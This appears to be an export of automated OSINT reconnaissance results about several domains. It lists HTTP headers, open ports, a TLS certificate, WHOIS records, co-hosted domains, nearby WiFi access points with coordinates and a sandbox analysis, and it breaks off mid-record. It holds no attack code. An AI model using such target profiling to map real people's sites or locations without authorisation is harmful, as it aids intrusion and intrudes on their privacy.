| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | referrer-policy: same-origin | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=u1lyJPU0WioZJ7gW30pw%2F1QYGnEvSi6VguD4iZQLy9JFxNjUYX7Kn2AvbK1RwFeWf6Bc3GtzenDe9QfSS82xeo%2BaVIIeURcDQSNP2UoyOSj%2Fo0e2kf0IgvowllGBeio%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:22 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f60715ea2423d-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:32:00 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.1:8080 | 188.114.97.0/24 |
| 2023-05-12 03:03:32 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 007jedgar.github.io |
| 2023-05-12 02:53:22 | IP Address | No | Mnemonic PassiveDNS | 0 | 0 | 2 | 0 | None | 172.67.168.252 | nwapi2.battleb0t.xyz |
| 2023-05-12 02:54:20 | HTTP Status Code | No | Web Spider | 0 | 1 | 2 | 0 | None | 521 | nuke.battleb0t.xyz |
| 2023-05-12 03:27:00 | Web Technology | No | Web Server Identifier | 0 | 0 | 3 | 0 | None | Express | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "x-powered-by": "Express", "transfer-encoding": "chunked", "cf-cache-status": "DYNAMIC", "content-encoding": "gzip", "server": "cloudflare", "last-modified": "Tue, 01 Jan 1980 00:00:01 GMT", "connection": "keep-alive", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=lshBmhR4GSBYjKDefqIGkygGexG96Rixvbfv4WfP5q9iY7bD%2BJ8d%2FnJqoPqz7%2FLjDZIRQ0jW5G%2BSrG0ejdUc3LLQdFd%2BIoXwZdUdzxFXOZIrwBisdLoxnDYZ09vi9PExVEvG%2FnDtTw%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=0", "date": "Fri, 12 May 2023 02:54:15 GMT", "cf-ray": "7c5f6041aa868cdc-EWR", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "content-type": "text/html; charset=UTF-8"} |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | SX55155D43E (Net ID: 00:01:E3:55:D4:3E) | 52.3759, 4.8975 |
| 2023-05-12 02:55:05 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c5acc457cc32d9a-ORD
Content-Encoding: gzip
| 188.114.97.1 |
| 2023-05-12 02:44:09 | SSL Certificate - Raw Data | No | CertSpotter | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
0c:e3:f4:1c:e8:cb:bb:cf:13:f7:6c:6f:36:5e:c2:eb
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Google Trust Services LLC, CN=GTS CA 1P5
Validity
Not Before: Feb 11 05:22:10 2023 GMT
Not After : May 12 05:22:09 2023 GMT
Subject: CN=*.ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:ce:18:28:ee:1e:4b:a0:54:f5:b2:a8:46:72:fa:
7a:1b:b5:83:d9:b7:b9:85:b6:7e:b8:27:ed:42:bb:
f5:8d:d9:0c:96:a1:ac:39:e8:ba:ac:6a:f9:9f:0d:
46:7d:1d:65:d4:56:4a:89:c7:ac:f3:42:0e:7d:79:
7a:b0:01:1a:1e:df:5a:64:96:92:41:7b:76:b3:71:
65:05:d4:d3:ac:cb:dd:ed:f6:10:2e:3d:94:bc:fe:
b8:5d:9b:af:1f:73:66:41:55:24:91:8f:6a:93:09:
c4:a9:4e:cc:3f:db:83:53:92:be:e5:79:63:d7:c0:
f2:ad:fb:15:4c:da:cf:26:0f:ae:09:13:32:5e:2f:
61:79:df:43:b7:2e:3e:7a:3f:f1:71:51:6a:d0:2c:
51:14:2b:e5:5a:3a:2a:63:a7:80:69:d6:dd:ff:21:
c9:3a:6c:59:b1:94:d7:a0:d6:e0:c5:59:62:0d:45:
33:fc:cc:08:f3:b9:08:a9:ea:24:98:5f:22:3c:5b:
51:7a:ef:2a:db:8c:ca:b6:bd:39:1c:ec:e9:76:19:
54:df:f7:38:11:32:20:7f:02:4a:bb:97:a7:34:fd:
a8:8b:36:ea:36:af:62:53:9d:78:4a:b7:98:3a:a9:
07:8f:74:9e:43:31:08:ab:be:62:c0:5e:01:ec:ce:
53:dd
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
F7:A7:5E:24:2E:1C:7A:7A:2A:90:36:DF:66:18:6B:A7:17:36:7E:3E
X509v3 Authority Key Identifier:
keyid:D5:FC:9E:0D:DF:1E:CA:DD:08:97:97:6E:2B:C5:5F:C5:2B:F5:EC:B8
Authority Information Access:
OCSP - URI:http://ocsp.pki.goog/s/gts1p5/_NaLKSGSIEY
CA Issuers - URI:http://pki.goog/repo/certs/gts1p5.der
X509v3 Subject Alternative Name:
DNS:*.ayhu.xyz, DNS:ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.11129.2.5.3
X509v3 CRL Distribution Points:
Full Name:
URI:http://crls.pki.goog/gts1p5/fXbrD094iyQ.crl
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
09:bc:ea:b6:cf:53:d5:18:fa:35:01:f5:1a:84:b4:db:1b:35:
a8:21:d4:b0:1c:8c:61:d9:0a:ed:8a:98:0e:ec:59:d1:7e:8a:
57:4f:81:85:21:9d:81:17:a5:6d:50:b7:02:17:30:3f:51:39:
0f:0d:a8:d9:9c:3b:6f:9f:16:6b:f6:f6:71:30:1e:f6:cd:df:
76:28:c1:38:b4:2a:e8:d2:ce:d8:22:7a:dc:2b:32:d6:cb:47:
88:b5:09:84:fa:12:6c:6e:e0:35:16:bb:24:8c:97:ba:91:7e:
45:50:9e:95:dc:7b:ff:96:e1:f9:37:11:30:5c:89:2e:ed:a5:
42:7f:26:b7:5c:84:0f:5f:e0:da:f9:32:fa:e2:bd:aa:52:51:
70:cd:f0:79:e0:2d:8e:67:56:3c:ba:c2:1e:d9:2f:a6:4b:13:
8c:cf:70:85:8b:05:86:ea:ed:7a:8a:75:c4:87:c4:fc:b8:11:
72:8c:37:b1:f0:08:21:35:fa:6a:0a:a7:28:58:06:2e:4b:74:
11:70:1e:20:5f:d2:60:2c:f6:42:ca:fa:2c:6e:50:27:2a:ea:
bd:8f:2d:c2:66:e4:e3:0c:69:4a:0b:47:18:a2:29:2b:ca:35:
4e:52:e9:78:dd:08:a8:e2:6b:51:5d:78:d4:f2:8b:19:66:55:
d1:aa:21:f5
| ayhu.xyz |
| 2023-05-12 03:24:30 | Affiliate - Company Name | No | Company Name Extractor | 0 | 0 | 7 | 0 | None | NameCheap, Inc. | Domain Name: NETCRAFT.COM
Registry Domain ID: 509179_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 2022-12-07T10:43:50Z
Creation Date: 1994-10-18T04:00:00Z
Registry Expiry Date: 2026-10-17T04:00:00Z
Registrar: NameCheap, Inc.
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.6613102107
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: AUTHNS1.NETCRAFT.COM
Name Server: AUTHNS2.NETCRAFT.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:12:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain name: netcraft.com
Registry Domain ID: 509179_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 2020-09-21T12:40:37.88Z
Creation Date: 1994-10-18T04:00:00.00Z
Registrar Registration Expiration Date: 2026-10-17T04:00:00.00Z
Registrar: NAMECHEAP INC
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Reseller: NAMECHEAP INC
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: Redacted for Privacy
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: Kalkofnsvegur 2
Registrant City: Reykjavik
Registrant State/Province: Capital Region
Registrant Postal Code: 101
Registrant Country: IS
Registrant Phone: +354.4212434
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: fd796f83a89a42f2a69f4b9f2c757b8f.protect@withheldforprivacy.com
Registry Admin ID:
Admin Name: Redacted for Privacy
Admin Organization: Privacy service provided by Withheld for Privacy ehf
Admin Street: Kalkofnsvegur 2
Admin City: Reykjavik
Admin State/Province: Capital Region
Admin Postal Code: 101
Admin Country: IS
Admin Phone: +354.4212434
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: fd796f83a89a42f2a69f4b9f2c757b8f.protect@withheldforprivacy.com
Registry Tech ID:
Tech Name: Redacted for Privacy
Tech Organization: Privacy service provided by Withheld for Privacy ehf
Tech Street: Kalkofnsvegur 2
Tech City: Reykjavik
Tech State/Province: Capital Region
Tech Postal Code: 101
Tech Country: IS
Tech Phone: +354.4212434
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: fd796f83a89a42f2a69f4b9f2c757b8f.protect@withheldforprivacy.com
Name Server: authns1.netcraft.com
Name Server: authns2.netcraft.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-11T07:56:11.35Z <<<
For more information on Whois status codes, please visit https://icann.org/epp |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Hangar6 (Net ID: 00:02:6F:E9:36:AC) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:32:15 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.8:80 | 188.114.97.0/24 |
| 2023-05-12 02:44:28 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | ayhu.xyz | CN=*.ayhu.xyz |
| 2023-05-12 02:53:35 | Raw Data from RIRs | No | Censys | 0 | 0 | 2 | 0 | None | {"last_updated_at": "2023-05-11T23:24:30.410Z", "ip": "185.199.110.153", "location_updated_at": "2023-05-01T12:36:37.024174Z", "autonomous_system_updated_at": "2023-05-06T01:31:22.928187Z", "location": {"province": "California", "city": "San Francisco", "country": "United States", "coordinates": {"latitude": 37.7621, "longitude": -122.3971}, "postal_code": "94107", "country_code": "US", "timezone": "America/Los_Angeles", "continent": "North America"}, "dns": {"records": {"docs.c-labs.com": {"record_type": "CNAME", "resolved_at": "2023-03-17T13:39:25.912117315Z"}, "0bs3rver.space": {"record_type": "CNAME", "resolved_at": "2023-04-07T21:20:07.161720197Z"}, "mitori.art": {"record_type": "A", "resolved_at": "2023-04-22T12:20:33.251806348Z"}, "lisihui.com": {"record_type": "CNAME", "resolved_at": "2023-03-06T14:30:11.269509368Z"}, "rowanmanning.com": {"record_type": "A", "resolved_at": "2023-03-16T14:14:04.579032272Z"}, "www.rohankumar.org": {"record_type": "CNAME", "resolved_at": "2023-03-31T01:25:23.527231408Z"}, "www.wise.fitness": {"record_type": "CNAME", "resolved_at": "2023-04-26T17:59:27.361118834Z"}, "gg349.net": {"record_type": "A", "resolved_at": "2023-04-13T04:51:06.304779399Z"}, "learn.madetech.com": {"record_type": "CNAME", "resolved_at": "2023-04-11T15:40:02.776726856Z"}, "gauravx.me": {"record_type": "A", "resolved_at": "2022-11-26T15:26:54.328782961Z"}, "njuics.cn": {"record_type": "CNAME", "resolved_at": "2023-03-22T10:17:45.580207010Z"}, "fanschou.github.io": {"record_type": "A", "resolved_at": "2023-03-20T01:52:09.688479139Z"}, "meth.supplies": {"record_type": "A", "resolved_at": "2023-03-04T19:36:17.924857492Z"}, "www.conoredmonds.com": {"record_type": "CNAME", "resolved_at": "2023-03-02T20:18:18.146944734Z"}, "www.floraguo.ca": {"record_type": "CNAME", "resolved_at": "2023-03-17T01:49:53.573471096Z"}, "devxchange.io": {"record_type": "A", "resolved_at": "2023-03-07T16:15:10.934357942Z"}, "bbochallenge.com": {"record_type": "A", "resolved_at": "2023-05-08T21:05:49.539576877Z"}, "vortaro.warut.net": {"record_type": "CNAME", "resolved_at": "2023-04-28T21:44:00.274408560Z"}, "www.2briley.com": {"record_type": "CNAME", "resolved_at": "2023-04-28T13:20:47.065260373Z"}, "www.diogomacedo.com.br": {"record_type": "A", "resolved_at": "2023-05-07T12:29:41.333779966Z"}, "get.intersolar-nft.com": {"record_type": "CNAME", "resolved_at": "2022-09-29T13:43:22.976827994Z"}, "bonnyjain.com": {"record_type": "CNAME", "resolved_at": "2023-03-09T13:34:20.462939696Z"}, "www.richardstrasse.de": {"record_type": "CNAME", "resolved_at": "2023-05-10T16:20:04.253920170Z"}, "www.wwhite13.com": {"record_type": "CNAME", "resolved_at": "2023-03-22T07:48:58.048294246Z"}, "intersolarnft.github.io": {"record_type": "A", "resolved_at": "2023-03-10T00:16:10.689229599Z"}, "www.nekopiano.com": {"record_type": "CNAME", "resolved_at": "2023-03-17T14:37:04.668920218Z"}, "www.urovo.co.id": {"record_type": "CNAME", "resolved_at": "2023-03-22T11:28:31.786000006Z"}, "az-media-group.com": {"record_type": "A", "resolved_at": "2023-03-13T21:28:40.572309228Z"}, "afrirpay.com": {"record_type": "A", "resolved_at": "2023-03-20T19:40:07.274096579Z"}, "www.peej.co.uk": {"record_type": "CNAME", "resolved_at": "2023-05-04T06:26:44.450349253Z"}, "www.mmtr.me": {"record_type": "CNAME", "resolved_at": "2023-03-31T02:37:55.288583037Z"}, "www.funmitoblessed.com": {"record_type": "CNAME", "resolved_at": "2023-04-24T14:40:07.732044366Z"}, "api.kekesi.dev": {"record_type": "CNAME", "resolved_at": "2023-03-20T15:57:13.673998398Z"}, "www.jordancox.me": {"record_type": "CNAME", "resolved_at": "2023-02-25T17:36:05.584035257Z"}, "www.gmacd.net": {"record_type": "CNAME", "resolved_at": "2023-04-11T20:22:42.495209956Z"}, "www.rowanmanning.com": {"record_type": "CNAME", "resolved_at": "2023-03-22T10:54:15.722717563Z"}, "www.vishvak.com": {"record_type": "CNAME", "resolved_at": "2023-03-23T05:45:50.510079142Z"}, "xn--net-0y9d003h.net": {"record_type": "A", "resolved_at": "2022-09-30T17:04:55.478194970Z"}, "www.yudongyao.com": {"record_type": "CNAME", "resolved_at": "2023-03-08T15:23:44.312163953Z"}, "suspendedgravity.com": {"record_type": "A", "resolved_at": "2023-03-19T14:58:55.258229106Z"}, "www.liufuwen.com": {"record_type": "CNAME", "resolved_at": "2023-03-30T00:11:36.398875577Z"}, "www.phorgr.com": {"record_type": "CNAME", "resolved_at": "2022-11-21T13:38:18.017307639Z"}, "jackcook.com": {"record_type": "A", "resolved_at": "2023-03-13T22:18:27.163100214Z"}, "comics.bilardi.net": {"record_type": "CNAME", "resolved_at": "2023-05-08T19:49:11.854401544Z"}, "www.littlejohnengineering.co.uk": {"record_type": "CNAME", "resolved_at": "2023-03-17T19:35:20.132850023Z"}, "www.dokomado.com": {"record_type": "CNAME", "resolved_at": "2023-04-21T22:50:25.934348288Z"}, "alzhao.com": {"record_type": "CNAME", "resolved_at": "2023-03-11T12:58:23.599756683Z"}, "flatroofingsussex.github.io": {"record_type": "A", "resolved_at": "2023-03-08T16:27:19.089505234Z"}, "gmacd.net": {"record_type": "A", "resolved_at": "2023-04-27T21:00:21.802895223Z"}, "hot-wheelz-of-time.org": {"record_type": "A", "resolved_at": "2023-03-08T19:15:03.099082898Z"}, "scorestar.net": {"record_type": "A", "resolved_at": "2023-01-27T16:37:47.492965822Z"}, "www.vividcivic.com": {"record_type": "CNAME", "resolved_at": "2023-03-11T15:17:15.398159440Z"}, "www.ericdallo.dev": {"record_type": "CNAME", "resolved_at": "2023-03-17T15:48:26.937961924Z"}, "dmitrydwhite.com": {"record_type": "A", "resolved_at": "2023-03-22T10:36:00.564584517Z"}, "gmacd.github.io": {"record_type": "A", "resolved_at": "2023-03-21T01:31:25.465960326Z"}, "www.harrisosserman.com": {"record_type": "CNAME", "resolved_at": "2023-02-28T14:03:52.247193728Z"}, "iramax.plasmic.site": {"record_type": "CNAME", "resolved_at": "2023-02-28T18:47:24.920115614Z"}, "kleinsplayground.com": {"record_type": "A", "resolved_at": "2023-03-22T18:44:01.108063584Z"}, "funmitoblessed.github.io": {"record_type": "A", "resolved_at": "2023-03-22T11:31:23.278745293Z"}, "qfield.org": {"record_type": "A", "resolved_at": "2023-03-12T17:49:56.752630209Z"}, "asm.lucasteske.dev": {"record_type": "CNAME", "resolved_at": "2022-11-14T14:35:22.539258750Z"}, "www.tiffanylo.info": {"record_type": "CNAME", "resolved_at": "2023-03-21T01:28:07.161359635Z"}, "agnias47.github.io": {"record_type": "A", "resolved_at": "2023-03-14T15:57:58.140445992Z"}, "www.flatroofingsussex.co.uk": {"record_type": "CNAME", "resolved_at": "2023-03-05T19:57:33.956373565Z"}, "dokomado.com": {"record_type": "A", "resolved_at": "2023-03-12T13:46:45.810442245Z"}, "wise.fitness": {"record_type": "A", "resolved_at": "2023-03-07T15:51:26.458635165Z"}, "www.eknert.com": {"record_type": "CNAME", "resolved_at": "2023-03-09T21:55:19.776247657Z"}, "edwinchoate.com": {"record_type": "A", "resolved_at": "2023-03-10T13:30:14.902307248Z"}, "millinow.com": {"record_type": "A", "resolved_at": "2022-09-26T14:09:37.255614081Z"}, "microngap.io": {"record_type": "CNAME", "resolved_at": "2023-03-21T01:33:09.161837848Z"}, "turtledev.in": {"record_type": "A", "resolved_at": "2023-03-17T16:23:43.722396430Z"}, "wolfgangbai.top": {"record_type": "CNAME", "resolved_at": "2023-03-08T00:37:57.090239320Z"}, "www.maxn.me": {"record_type": "CNAME", "resolved_at": "2023-03-17T17:01:10.376655200Z"}, "www.uncommonhacks.com": {"record_type": "CNAME", "resolved_at": "2023-03-16T14:35:06.406550410Z"}, "maxkross.github.io": {"record_type": "A", "resolved_at": "2023-03-10T00:16:04.714610636Z"}, "daniego.github.io": {"record_type": "A", "resolved_at": "2023-03-08T16:27:21.119914909Z"}, "arthurkarrer.me": {"record_type": "A", "resolved_at": "2023-03-11T16:57:07.559804549Z"}, "www.sarahmantell.page": {"record_type": "CNAME", "resolved_at": "2023-03-21T05:57:30.087038111Z"}, "aubrielee.com": {"record_type": "A", "resolved_at": "2023-04-27T14:19:58.049894139Z"}, "cyberfriendscircle.io": {"record_type": "A", "resolved_at": "2023-04-23T17:40:41.917214504Z"}, "dhanush.is-a.dev": {"record_type": "CNAME", "resolved_at": "2023-03-09T23:39:54.025920340Z"}, "laperragorda.es": {"record_type": "A", "resolved_at": "2023-04-11T17:50:04.490005270Z"}, "static.test.habuhome.com": {"record_type": "CNAME", "resolved_at": "2023-03-23T15:22:37.725893073Z"}, "sslcbok.com": {"record_type": "A", "resolved_at": "2023-03-24T15:56:33.901120743Z"}, "maxn.me": {"record_type": "A", "resolved_at": "2023-03-14T01:02:41.344639104Z"}, "kitroed.com": {"record_type": "A", "resolved_at": "2023-03-18T14:36:48.838056806Z"}, "blog.oneminuter.com": {"record_type": "CNAME", "resolved_at": "2023-05-06T15:46:58.542682829Z"}, "janithpet.com": {"record_type": "A", "resolved_at": "2023-03-07T14:06:16.144562982Z"}, "www.guillermoch.com": {"record_type": "CNAME", "resolved_at": "2023-04-13T00:11:20.615747068Z"}, "www.kadupitiya.lk": {"record_type": "CNAME", "resolved_at": "2023-02-24T16:44:15.687183626Z"}, "robimsinazor.sk": {"record_type": "A", "resolved_at": "2023-02-22T21:18:54.646853756Z"}, "wanderandcompass.com": {"record_type": "A", "resolved_at": "2023-03-18T22:39:25.125598440Z"}, "vishvak.com": {"record_type": "A", "resolved_at": "2023-05-11T22:16:52.855230065Z"}, "t.iiwhy.cn": {"record_type": "CNAME", "resolved_at": "2023-03-09T12:46:57.908049390Z"}, "rpg.skmobi.com": {"record_type": "CNAME", "resolved_at": "2023-03-22T07:42:56.247014800Z"}, "www.staceywu.co.uk": {"record_type": "CNAME", "resolved_at": "2023-03-05T19:59:23.259144477Z"}, "www.wishingwellberlin.com": {"record_type": "CNAME", "resolved_at": "2023-04-28T17:00:16.833241253Z"}, "assets.javierarce.com": {"record_type": "CNAME", "resolved_at": "2023-03-30T15:20:51.562601099Z"}, "design.rs.no": {"record_type": "CNAME", "resolved_at": "2023-02-22T20:37:17.445718906Z"}, "www.agitator.com": {"record_type": "CNAME", "resolved_at": "2023-04-14T13:20:02.173553830Z"}}, "names": ["www.wise.fitness", "www.agitator.com", "www.rohankumar.org", "www.liufuwen.com", "cyberfriendscircle.io", "learn.madetech.com", "www.mmtr.me", "xn--net-0y9d003h.net", "kleinsplayground.com", "az-media-group.com", "aubrielee.com", "kitroed.com", "vortaro.warut.net", "www.yudongyao.com", "gauravx.me", "www.conoredmonds.com", "intersolarnft.github.io", "dhanush.is-a.dev", "mitori.art", "gmacd.net", "gg349 | 185.199.110.153 |
| 2023-05-12 02:57:14 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [u'35.229.48.116'], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://event.chatelet.com/site.webmanifest', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"x1.c.lencr.org"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar47D9.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"35.229.48.116:443"\n "184.31.135.120:80"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_e44_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_e44_IESQMMUTEX_0_519"\n "IsoScope_e44_IESQMMUTEX_0_303"\n "IsoScope_e44_IESQMMUTEX_0_331"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_e44_ConnHashTable<3652>_HashTable_Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_e44_IE_EarlyTabStart_0xd04_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3652"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab47D8.tmp" has type "Microsoft Cabinet archive data 61745 bytes 1 file"\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data 61745 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "BOPRH2ZO.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\BOPRH2ZO.txt]- [targetUID: 00000000-00003652]\n "~DF6A3B227269700CE8.TMP" has type "data"- Location: [%TEMP%\\~DF6A3B227269700CE8.TMP]- [targetUID: 00000000-00003652]\n "~DFB95C1DFB9DD9FD62.TMP" has type "data"- Location: [%TEMP%\\~DFB95C1DFB9DD9FD62.TMP]- [targetUID: 00000000-00003652]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002484]\n "6DB145CFEEC544B1582FED1ADA3370DD" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6DB145CFEEC544B1582FED1ADA3370DD]- [targetUID: 00000000-00002484]\n "69C6F6EC64E114822DF688DC12CDD86C" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\69C6F6EC64E114822DF688DC12CDD86C]- [targetUID: 00000000-00002484]\n "search_2_.json" has type "ASCII text with no line terminators"- [targetUID: N/A]\n "VT6JSXYH.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\VT6JSXYH.txt]- [targetUID: 00000000-00002484]\n "~DF76716775CE99AC80.TMP" has type "data"- Location: 